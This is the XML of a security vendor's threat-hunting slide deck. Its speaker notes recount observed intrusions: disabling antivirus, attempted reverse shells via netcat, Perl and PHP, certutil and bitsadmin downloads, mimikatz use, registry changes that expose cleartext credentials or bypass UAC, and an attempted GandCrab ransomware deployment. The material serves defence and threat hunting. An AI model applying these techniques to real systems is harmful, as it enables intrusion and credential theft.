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1" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId22"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId23"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="295" r:id="rId3"/>
    <p:sldId id="813" r:id="rId4"/>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="322" r:id="rId6"/>
    <p:sldId id="829" r:id="rId7"/>
    <p:sldId id="830" r:id="rId8"/>
    <p:sldId id="818" r:id="rId9"/>
    <p:sldId id="819" r:id="rId10"/>
    <p:sldId id="828" r:id="rId11"/>
    <p:sldId id="820" r:id="rId12"/>
    <p:sldId id="831" r:id="rId13"/>
    <p:sldId id="827" r:id="rId14"/>
    <p:sldId id="821" r:id="rId15"/>
    <p:sldId id="832" r:id="rId16"/>
    <p:sldId id="824" r:id="rId17"/>
    <p:sldId id="825" r:id="rId18"/>
    <p:sldId id="826" r:id="rId19"/>
    <p:sldId id="823" r:id="rId20"/>
    <p:sldId id="73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yan York" initials="BY [11]" lastIdx="1" clrIdx="6"/>
  <p:cmAuthor id="1" name="Bryan York" initials="BY [9]" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="8" name="Brendon" initials="B" lastIdx="3" clrIdx="7"/>
  <p:cmAuthor id="2" name="Bryan York" initials="BY [10]" lastIdx="1" clrIdx="1"/>
  <p:cmAuthor id="9" name="Bryan York" initials="BY" lastIdx="3" clrIdx="8">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="Bryan York" initials="BY [6]" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="10" name="Ken Warren" initials="KW" lastIdx="4" clrIdx="9"/>
  <p:cmAuthor id="4" name="Bryan York" initials="BY [8]" lastIdx="1" clrIdx="3"/>
  <p:cmAuthor id="11" name="Bryan York" initials="BY [2]" lastIdx="1" clrIdx="10">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="5" name="Bryan York" initials="BY [3] [2] [2]" lastIdx="1" clrIdx="4"/>
  <p:cmAuthor id="12" name="Bryan York" initials="BY [2] [2]" lastIdx="1" clrIdx="11">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="6" name="Bryan York" initials="BY [4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7"/>
    <p:restoredTop sz="74792" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="22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54431-357E-F74E-91E3-1AB124FE06F4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106AA-C1B3-AA49-B07C-40A1A599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8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0A10-97B6-8245-A9FC-4DBFF95A9A25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46AE-6BE4-9C4C-9E53-DB629F4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3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vm.io/workflow/hook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ntest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit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OverWatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> threat hunters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OutReach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – strategic tracking, develop and share tactical intel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role starts when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OverWatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> notifies a customer of “hands-on-keyboard” activity as a result of threat hunting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CrowdStrike Services Lunch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EAE13E-ACAF-4D66-A282-F2D691BF111E}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>May 24,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2017 CrowdStrike,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8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Example command lines observed for disabling security tools/AV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That last bullet changed in May, 2019 – an actor was observed logging into systems via RDP, and for those systems with the sensor installed, we could see them run “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” and then log out.  The assumption is that the actor was mapping systems to which they had access that were running the Falcon sensor, and determining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>blind spots.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 team is used to seeing the first two command lines in both legitimate testing, as well as employed by threat actors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first command line may be employed locally, or pushed out remotely via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The third command line is something seen in Feb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entry - use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> observed Dec 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second entry – variant observed in Mar, 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third entry – CS OW has seen this similar command lines since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/wiki/Code_page_850#cite_note-DIS-3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>after_cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ hooks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://rvm.io/workflow/hooks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5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5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Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> disclosure: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https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html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Thank you, everyone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Any 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3FD3-C94A-44B4-8822-3B8B57D8D2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2016, CrowdStrike Services Inc.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CrowdStrike Presentation, November 17 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23380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9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discuss collection bias in order to set expectations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aspects of collection bias:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- pre-existing breach - unless it becomes a full IR engagement, we have no way to determine dwell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8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Tracking is performed via MISP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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The image is a consolidation of all events tracked in 2018, available in the GTR.</a:t>
            </a:r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this illustrates is:</a:t>
            </a:r>
          </a:p>
          <a:p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we’d want to focus our efforts if starting new (“Valid Accounts”)</a:t>
            </a:r>
          </a:p>
          <a:p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www.crowdstrike.com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/resources/reports/2019-crowdstrike-global-threat-report/</a:t>
            </a:r>
          </a:p>
          <a:p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*As of 19 Feb, been getting a good deal of interest and positive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4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7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Modifying system binaries: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.crowdstrike.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/adversary-extends-persistence-by-modifying-system-binaries/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UseLogonCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – setting of “1” stores credentials in memory, in clear text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LocalAccountTokenFilterPolicy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support.microsoft.com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-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DisablePasswordChange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support.microsoft.com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-us/help/154501/how-to-disable-automatic-machine-account-password-changes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examples as stories, in a conversational tone/manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specific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Actor misspells commands, finally implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StickyKeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; sensor blocks attempts, they move on to something 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Actor accessed system via web shell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Uploaded and attempted to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to open a reverse shell; attempts blocked by sensor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Attempted reverse shell via “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –e”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Attempted reverse shell via PHP (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), exec())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Used ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was actually on the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Moved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Actor accesses three different systems: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1 - Disables/uninstalls Windows Defender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2 - Runs ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msiexec.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” with 24 diff. GUIDs (batch file) to uninstall McAfee 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3 - Uninstalls ESET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 apparent attempts to see what was installed on systems 2 and 3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www.crowdstrike.com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/blog/managed-threat-hunting-meets-the-challenge-of-the-tenacious-adversary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Actor accesses system via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlservr.exe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Attempts to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bitsadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to download file are blocked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Troubleshoots with ping &amp; ftp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Continues to repeatedly attempt to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bitsadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, even though the commands are blocked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Helix Kitten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Accessed system via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, modified Registry to permit UAC bypass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Could not execute backdoor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Enumerated processes, was NOT able to tamper with sensor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Pinchy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Spider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Attempts to deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GandCrab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ransomware blocked by the sensor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Actor used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in attempts to disable/remove Windows Defender, MS Security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Actor used PowerShell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>net.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>taskkill.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to disable MSSQL-related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Actor used various “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /x” command lines to (attempt to) remove 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46AE-6BE4-9C4C-9E53-DB629F49D9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1" y="0"/>
            <a:ext cx="9142809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1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5942"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2111141" y="0"/>
            <a:ext cx="6926723" cy="45686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9428" y="2399353"/>
            <a:ext cx="524091" cy="557504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="ltUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent6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100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75008" y="2399353"/>
            <a:ext cx="2848228" cy="557504"/>
            <a:chOff x="765088" y="3199138"/>
            <a:chExt cx="3797637" cy="743338"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="765088" y="3199138"/>
              <a:ext cx="3797637" cy="7433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173" y="3446165"/>
              <a:ext cx="3202045" cy="286499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5008" y="3073138"/>
            <a:ext cx="4845050" cy="11466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1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="18288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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/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5008" y="4329301"/>
            <a:ext cx="4845050" cy="33696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1500" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="18288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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Name, title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6182491" y="4921114"/>
            <a:ext cx="2894846" cy="13692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r>
              <a:rPr lang="en-US" sz="600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="A0A2A3"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Pro Bk"/>
                <a:cs typeface="ITC Avant Garde Pro Bk"/>
              </a:rPr>
              <a:t>2015 CROWDSTRIKE, INC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A0A2A3"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Pro Bk"/>
                <a:cs typeface="ITC Avant Garde Pro Bk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58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617088" y="1314868"/>
            <a:ext cx="7909375" cy="298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617089" y="1314868"/>
            <a:ext cx="3798302" cy="298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26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728610" y="1314868"/>
            <a:ext cx="3798302" cy="298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8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617089" y="1314868"/>
            <a:ext cx="3798302" cy="298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26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728610" y="1314868"/>
            <a:ext cx="3798302" cy="298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4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088" y="1312223"/>
            <a:ext cx="7909375" cy="2993079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2" spcCol="288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4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7088" y="1817069"/>
            <a:ext cx="3303477" cy="2202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72945" y="1817069"/>
            <a:ext cx="45719" cy="2202347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082" y="1964950"/>
            <a:ext cx="2973490" cy="1906584"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="18288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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>to add key topic information. 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434541" y="1817070"/>
            <a:ext cx="4091922" cy="22023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0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7089" y="1817069"/>
            <a:ext cx="2754762" cy="2202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72945" y="1817069"/>
            <a:ext cx="45719" cy="2202347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082" y="1964950"/>
            <a:ext cx="2393825" cy="1906584"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="182880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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>to add key topic information. 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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649436" y="1816678"/>
            <a:ext cx="4877027" cy="2202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52424" y="1817069"/>
            <a:ext cx="3391575" cy="2202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708281" y="1817069"/>
            <a:ext cx="45719" cy="2202347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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617088" y="1816678"/>
            <a:ext cx="4877027" cy="2202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04112" y="1958162"/>
            <a:ext cx="2622351" cy="192175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6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1817069"/>
            <a:ext cx="4571999" cy="2202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3" t="18522" r="9393" b="18522"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184060" y="1989032"/>
            <a:ext cx="2481832" cy="1923870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978400" y="1977814"/>
            <a:ext cx="3409082" cy="1273175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="251999" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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18288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977709" y="3250631"/>
            <a:ext cx="3409746" cy="636588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr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4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1817069"/>
            <a:ext cx="4571999" cy="2202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17779" y="1977814"/>
            <a:ext cx="3409082" cy="1273175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="251999" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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18288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17088" y="3250631"/>
            <a:ext cx="3409746" cy="636588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr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978400" y="1977814"/>
            <a:ext cx="3409082" cy="1273175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="251999" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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18288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4977709" y="3250631"/>
            <a:ext cx="3409746" cy="636588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr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47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817069"/>
            <a:ext cx="3126921" cy="2202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33552" y="2016579"/>
            <a:ext cx="2280542" cy="963385"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="180000" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="6600" b="1" i="0"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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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18288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532861" y="2979964"/>
            <a:ext cx="2280985" cy="907255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432074" y="2016579"/>
            <a:ext cx="2280542" cy="963385"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="180000" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="6600" b="1" i="0"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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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18288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3431383" y="2979964"/>
            <a:ext cx="2280985" cy="907255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016830" y="1817069"/>
            <a:ext cx="3127170" cy="2202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319647" y="2016579"/>
            <a:ext cx="2280542" cy="963385"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="180000" bIns="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="6600" b="1" i="0"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1pPr>
            <a:lvl2pPr marL="4572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9144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3716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1828800" indent="0">
              <a:buNone/>
              <a:defRPr sz="8800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956" y="2979964"/>
            <a:ext cx="2280985" cy="907255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7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1" y="0"/>
            <a:ext cx="9142809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100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75472" y="1450425"/>
            <a:ext cx="7514751" cy="11466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00" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="18288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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add Section 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75472" y="2597101"/>
            <a:ext cx="7514751" cy="336967"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="108000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1500" b="0" i="0" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Click to add section subtitle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" y="135789"/>
            <a:ext cx="1361588" cy="219979"/>
            <a:chOff x="-27498" y="350420"/>
            <a:chExt cx="3450734" cy="557504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-27498" y="350420"/>
              <a:ext cx="542162" cy="557504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100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75008" y="350420"/>
              <a:ext cx="2848228" cy="557504"/>
              <a:chOff x="765088" y="3199138"/>
              <a:chExt cx="3797637" cy="74333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65088" y="3199138"/>
                <a:ext cx="3797637" cy="7433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3173" y="3446165"/>
                <a:ext cx="3202045" cy="286499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6912" y="4719757"/>
            <a:ext cx="388492" cy="3040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73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0" y="1"/>
            <a:ext cx="9144000" cy="5143499"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="80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63575" y="2054226"/>
            <a:ext cx="2178050" cy="59916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3515553" y="2054226"/>
            <a:ext cx="2178050" cy="59916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348413" y="2054226"/>
            <a:ext cx="2178050" cy="59916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663575" y="3164569"/>
            <a:ext cx="2178050" cy="59916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3515553" y="3164569"/>
            <a:ext cx="2178050" cy="59916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6348413" y="3164569"/>
            <a:ext cx="2178050" cy="59916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66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617088" y="2055344"/>
            <a:ext cx="45720" cy="59827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67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3469066" y="2055344"/>
            <a:ext cx="45720" cy="59827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68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6301926" y="2055344"/>
            <a:ext cx="45720" cy="59827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69" name="Text Placeholder 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617088" y="3165687"/>
            <a:ext cx="45720" cy="59827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70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3469066" y="3165687"/>
            <a:ext cx="45720" cy="59827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71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6301926" y="3165687"/>
            <a:ext cx="45720" cy="59827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77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85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s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13693" y="64186"/>
            <a:ext cx="1771650" cy="7503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accent6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Logo block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Copy and paste this graphic onto any slide where the logo block is covered by an image.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:cs typeface="ITC Avant Garde Gothic Pro Book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48910" y="61175"/>
            <a:ext cx="113118" cy="647700"/>
            <a:chOff x="2805022" y="318407"/>
            <a:chExt cx="113118" cy="64770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2914650" y="318407"/>
              <a:ext cx="0" cy="64770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riangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2774256" y="455690"/>
              <a:ext cx="174650" cy="1131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543872" y="1407492"/>
            <a:ext cx="7947191" cy="4830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accent6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Table Style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Use this table by copying it to the destination slide and changing the data, or as an example for how to format an existing table.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:ea typeface="ITC Avant Garde Gothic Pro Book" charset="0"/>
              <a:cs typeface="ITC Avant Garde Gothic Pro Book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477341" y="-2120693"/>
            <a:ext cx="113118" cy="8122920"/>
            <a:chOff x="2805022" y="129542"/>
